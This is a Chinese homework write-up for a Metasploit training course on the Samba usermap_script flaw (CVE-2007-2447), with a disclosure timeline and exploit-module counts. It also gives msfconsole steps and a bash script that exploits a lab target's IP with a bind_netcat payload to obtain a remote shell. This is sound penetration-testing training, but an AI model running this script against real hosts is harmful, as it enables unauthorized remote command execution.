《Metasploit魔鬼训练营》第一章实践作业
1.搜集Samba服务usermap_script安全漏洞的相关信息,画出该安全漏洞的生命周期图,标注各个重要事件点的日期,并提供详细描述和链接。
参考链接:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447
http://samba.org/samba/security/CVE-2007-2447.html
https://www.samba.org/samba/history/security.html
https://github.com/rapid7/metasploit-framework/commits/master//modules/exploits/multi/samba/usermap_script.rb
描述:Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行,影响Samba的3.0.20到3.0.25rc3 版本,当使用非默认的用户名映射脚本配置选项时产生,通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令。
时间线:2007年5月7日漏洞被披露到security@samba.org这个邮箱中,2007年5月14日samba公开漏洞信息并提供了该漏洞的补丁。
2010年2月16日Metasploit首次为该漏洞提供攻击模块载荷。
2.利用Linux Shell命令统计出分别针对Windows 2000、Windows XP、Windows Server 2003、Windows Vista、Windows 7和Windows Server 2008目标环境的渗透攻击模块数量。
命令:search type:exploit target:Windows 2000
Windows 2000:170个
Windows XP:834个
Windows Server 2003:319个
Windows Vista:111个
Windows 7:705个
Windows Server 2008:278个
3.完成一次针对Linux靶机usermap_script漏洞的渗透攻击,尝试植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。
用show payload查看针对该漏洞的攻击载荷,然后用set payload命令设置攻击载荷;
show options命令可以查看配置,并用set命令完成相关的配置;
用exploit命令启动渗透攻击,成功getshell。
4.使用msfcli命令行接口编写一个Shell脚本程序,实现用户只需输入目标Linux靶机的IP地址作为参数,就可以使用usermap_script漏洞渗透攻击模块,获得靶机的远程Shell访问。
用vim编辑脚本test.sh
#!/bin/bash #表示用bash执行 echo "please set RHOST IP" read -p "IP:" IP #让用户输入目标IP msfconsole -x "use multi/samba/usermap_script;\set payload cmd/unix/bind_netcat;\set RHOST $IP;\run" #由于最新版本的Metasploit取消了msfcli,所以现在使用msfconsole -x来执行
编辑好test.sh后,用命令 ./test.sh来执行脚本(TIPS:如果是用vim直接创建的新文件,文件是没有可执行权限的,需要用chomd命令添加可执行权限。)
成功getshell。